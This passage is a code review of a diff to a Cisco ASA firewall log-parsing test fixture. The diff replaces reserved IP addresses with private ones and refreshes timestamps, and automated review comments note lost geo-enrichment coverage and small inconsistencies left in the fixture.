http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside +Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username) diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index 9195be0b43f..876d13e8e31 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -6,8 +6,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, 
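Review bot: On the rewritten last line of test-sample.log (`%ASA-6-302013: Built inbound TCP connection 27215708 ...`) the NAT-mapped source `(81.2.69.144/49926)` and the destination `vlan-42:81.2.69.144/80` are now the same routable address, and since that address is the one the geo database resolves, the expected output for this event (not on this page) will presumably carry identical geo/AS data on both sides if the NAT field is enriched too, so it cannot show whether enrichment landed on the intended field. The previous fixture had the same shape with `1.2.3.4`, but no enrichment fired for it, so the ambiguity did not matter then; using a second address from the same supported subset for the destination would make a mis-assignment visible. Also carried over unchanged on the new side: the `"PERMIT_IN" [0x0, 0x0]"` line still ends with a stray `"`, and several `302013`/`302015` lines give mapped addresses that do not match the preceding `305011` translation (e.g. `10.123.3.42/4953 (10.123.3.130/45392)` after a translation to `192.168.2.130/45392`). If those are deliberate robustness cases it would help to say so in the package's test notes.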
@@ -43,13 +43,13 @@
 "related": {
 "ip": [
 "10.1.2.30",
- "192.0.0.8"
+ "192.168.0.8"
 ]
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:38.565572200Z",
- "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]",
+ "ingested": "2021-12-09T13:34:16.394993200Z",
+ "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -76,8 +76,8 @@
 },
 "destination": {
 "port": 53,
- "address": "192.0.0.8",
- "ip": "192.0.0.8"
+ "address": "192.168.0.8",
+ "ip": "192.168.0.8"
 },
 "source": {
 "port": 63016,
@@ -113,13 +113,13 @@
 "related": {
 "ip": [
 "10.1.2.30",
- "192.0.0.8"
+ "192.168.0.8"
 ]
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:55:38.565579400Z",
- "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]",
+ "ingested": "2021-12-09T13:34:16.395002200Z",
+ "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -146,8 +146,8 @@
 },
 "destination": {
 "port": 2000,
- "address": "192.0.0.89",
- "ip": "192.0.0.89"
+ "address": "192.168.0.89",
+ "ip": "192.168.0.89"
 },
 "source": {
 "port": 2241,
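Review bot: The new `related.ip` and `event.original` values in this hunk place 192.168.0.8 on the `outside` interface (`dst outside:192.168.0.8/53`), i.e. an RFC 1918 private address where the old fixture had 192.0.0.8 from the IETF Protocol Assignments block (RFC 6890); neither range is geo-resolvable, but private space is what pipelines typically skip outright, so the regenerated expectation no longer shows how a routable destination on a deny event is handled. From what is visible, the only routable address left in the sample log is 81.2.69.144 in the `Jan 13 2021` 302013 event, so public-IP enrichment on the ACL/deny paths (106023, 106100) is apparently no longer exercised; if that enrichment matters, keep one deny event with a supported public destination in the sample log. This expected file is regenerated output, so the substantive decision lives in the sample-log hunk, which starts outside this view.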
@@ -183,13 +183,13 @@ "related": { "ip": [ "10.1.2.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565585600Z", - "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395008300Z", + "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -217,8 +217,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.10", - "ip": "192.0.2.10" + "address": "192.168.2.10", + "ip": "192.168.2.10" }, "source": { "port": 1039, @@ -258,7 +258,7 @@ ], "ip": [ "172.29.2.101", - "192.0.2.10" + "192.168.2.10" ] }, "host": { @@ -266,8 +266,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565590700Z", - "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", + "ingested": "2021-12-09T13:34:16.395031600Z", + "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -294,8 +294,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.57", - "ip": "192.0.2.57" + "address": "192.168.2.57", + "ip": "192.168.2.57" }, "source": { "port": 1065, @@ -335,7 +335,7 @@ ], "ip": [ "172.29.2.3", - "192.0.2.57" + "192.168.2.57" ] }, "host": { 
@@ -343,8 +343,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565594700Z", - "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", + "ingested": "2021-12-09T13:34:16.395053100Z", + "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -371,8 +371,8 @@ }, "destination": { "port": 12834, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4952, @@ -408,13 +408,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565599Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834", + "ingested": "2021-12-09T13:34:16.395058800Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -446,8 +446,8 @@ }, "source": { "port": 443, - "address": "192.0.2.43", - "ip": "192.0.2.43" + "address": "192.168.2.43", + "ip": "192.168.2.43" }, "tags": [ "preserve_original_event" 
@@ -478,14 +478,14 @@ }, "related": { "ip": [ - "192.0.2.43", + "192.168.2.43", "10.123.3.42" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565602600Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", + "ingested": "2021-12-09T13:34:16.395064300Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -501,7 +501,7 @@ "destination_interface": "outside", "mapped_source_port": 443, "mapped_destination_ip": "10.123.3.42", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743274", "source_interface": "outside", "mapped_destination_port": 12834 @@ -514,8 +514,8 @@ }, "destination": { "port": 25882, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 52925, @@ -551,13 +551,13 @@ "related": { "ip": [ "10.123.1.35", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565607900Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882", + "ingested": "2021-12-09T13:34:16.395069800Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -589,11 +589,11 @@ }, "source": { "nat": { - "ip": "192.0.2.43" + "ip": "192.168.2.43" }, - "address": "192.0.2.222", + "address": "192.168.2.222", "port": 53, - "ip": "192.0.2.222" + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -624,15 +624,15 @@ }, "related": { "ip": [ - "192.0.2.222", - "192.0.2.43", + "192.168.2.222", + "192.168.2.43", "10.123.1.35" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565613400Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", + "ingested": "2021-12-09T13:34:16.395075200Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -648,7 +648,7 @@ "destination_interface": "outside", "mapped_source_port": 53, "mapped_destination_ip": "10.123.1.35", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743275", "source_interface": "outside", "mapped_destination_port": 25882 @@ -661,8 +661,8 @@ }, "destination": { "port": 45392, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4953, @@ -698,13 +698,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565619900Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392", + "ingested": "2021-12-09T13:34:16.395080600Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -737,8 +737,8 @@ }, "source": { "port": 80, - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "tags": [ "preserve_original_event" 
@@ -769,15 +769,15 @@ }, "related": { "ip": [ - "192.0.2.1", + "192.168.2.1", "10.123.3.42", "10.123.3.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565627500Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", + "ingested": "2021-12-09T13:34:16.395086100Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -793,7 +793,7 @@ "destination_interface": "outside", "mapped_source_port": 80, "mapped_destination_ip": "10.123.3.130", - "mapped_source_ip": "192.0.2.1", + "mapped_source_ip": "192.168.2.1", "connection_id": "89743276", "source_interface": "outside", "mapped_destination_port": 45392 @@ -811,8 +811,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -843,15 +843,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-10-06T20:55:38.565635400Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", + "ingested": "2021-12-09T13:34:16.395092Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", "start": "2013-04-29T11:36:05.000Z", @@ -884,8 +884,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -916,15 +916,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-10-06T20:55:38.565643Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", + "ingested": "2021-12-09T13:34:16.395097700Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", "start": "2013-04-29T02:59:50.000Z", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565650900Z", + "ingested": "2021-12-09T13:34:16.395103300Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1016,8 +1016,8 @@ }, "destination": { "port": 10879, - "address": "192.0.0.130", - "ip": "192.0.0.130" + "address": "192.168.0.130", + "ip": "192.168.0.130" }, "source": { "port": 4954, @@ -1053,13 +1053,13 @@ "related": { "ip": [ "192.168.3.42", - "192.0.0.130" + "192.168.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565658400Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879", + "ingested": "2021-12-09T13:34:16.395108700Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1092,8 +1092,8 @@ }, "source": { "port": 80, - "address": "192.0.0.17", - "ip": "192.0.0.17" + "address": "192.168.0.17", + "ip": "192.168.0.17" }, "tags": [ "preserve_original_event" 
@@ -1124,15 +1124,15 @@ }, "related": { "ip": [ - "192.0.0.17", + "192.168.0.17", "192.168.3.42", "10.0.0.130" ] }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.565666100Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", + "ingested": "2021-12-09T13:34:16.395114200Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1148,7 +1148,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "10.0.0.130", - "mapped_source_ip": "192.0.0.17", + "mapped_source_ip": "192.168.0.17", "connection_id": "89743277", "source_interface": "outside", "mapped_destination_port": 10879 @@ -1166,8 +1166,8 @@ }, "source": { "port": 12981, - "address": "192.0.0.66", - "ip": "192.0.0.66" + "address": "192.168.0.66", + "ip": "192.168.0.66" }, "tags": [ "preserve_original_event" @@ -1189,14 +1189,14 @@ }, "related": { "ip": [ - "192.0.0.66", + "192.168.0.66", "10.1.2.60" ] }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565673900Z", - "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query", + "ingested": "2021-12-09T13:34:16.395119800Z", + "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -1219,8 +1219,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2006, 
@@ -1256,13 +1256,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565681600Z", - "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395125300Z", + "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1289,8 +1289,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49734, @@ -1326,13 +1326,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565689300Z", - "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395130800Z", + "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1359,8 +1359,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49735, 
@@ -1396,13 +1396,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565696900Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395136200Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1429,8 +1429,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49736, @@ -1466,13 +1466,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565701200Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395141700Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1499,8 +1499,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49737, 
@@ -1536,13 +1536,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565706600Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395147Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1569,8 +1569,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49738, @@ -1606,13 +1606,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565712100Z", - "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395152900Z", + "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1639,8 +1639,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49746, 
@@ -1676,13 +1676,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565718700Z", - "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395158500Z", + "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1709,8 +1709,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2007, @@ -1746,13 +1746,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565724100Z", - "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395165900Z", + "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565728100Z", + "ingested": "2021-12-09T13:34:16.395171200Z", "original": "Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1849,8 +1849,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2008, @@ -1886,13 +1886,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565732400Z", - "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395176100Z", + "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1924,8 +1924,8 @@ }, "source": { "port": 137, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -1951,14 +1951,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.2.42" ] }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565736Z", - "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside", + "ingested": "2021-12-09T13:34:16.395181700Z", + "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", "action": "firewall-rule", @@ -1988,8 +1988,8 @@ }, "source": { "port": 12981, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" 
@@ -2011,14 +2011,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.5.60" ] }, "event": { "severity": 2, - "ingested": "2021-10-06T20:55:38.565741300Z", - "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query", + "ingested": "2021-12-09T13:34:16.395187200Z", + "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -2041,8 +2041,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2009, @@ -2078,13 +2078,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.565746700Z", - "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:34:16.395192700Z", + "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2111,8 +2111,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49776, 
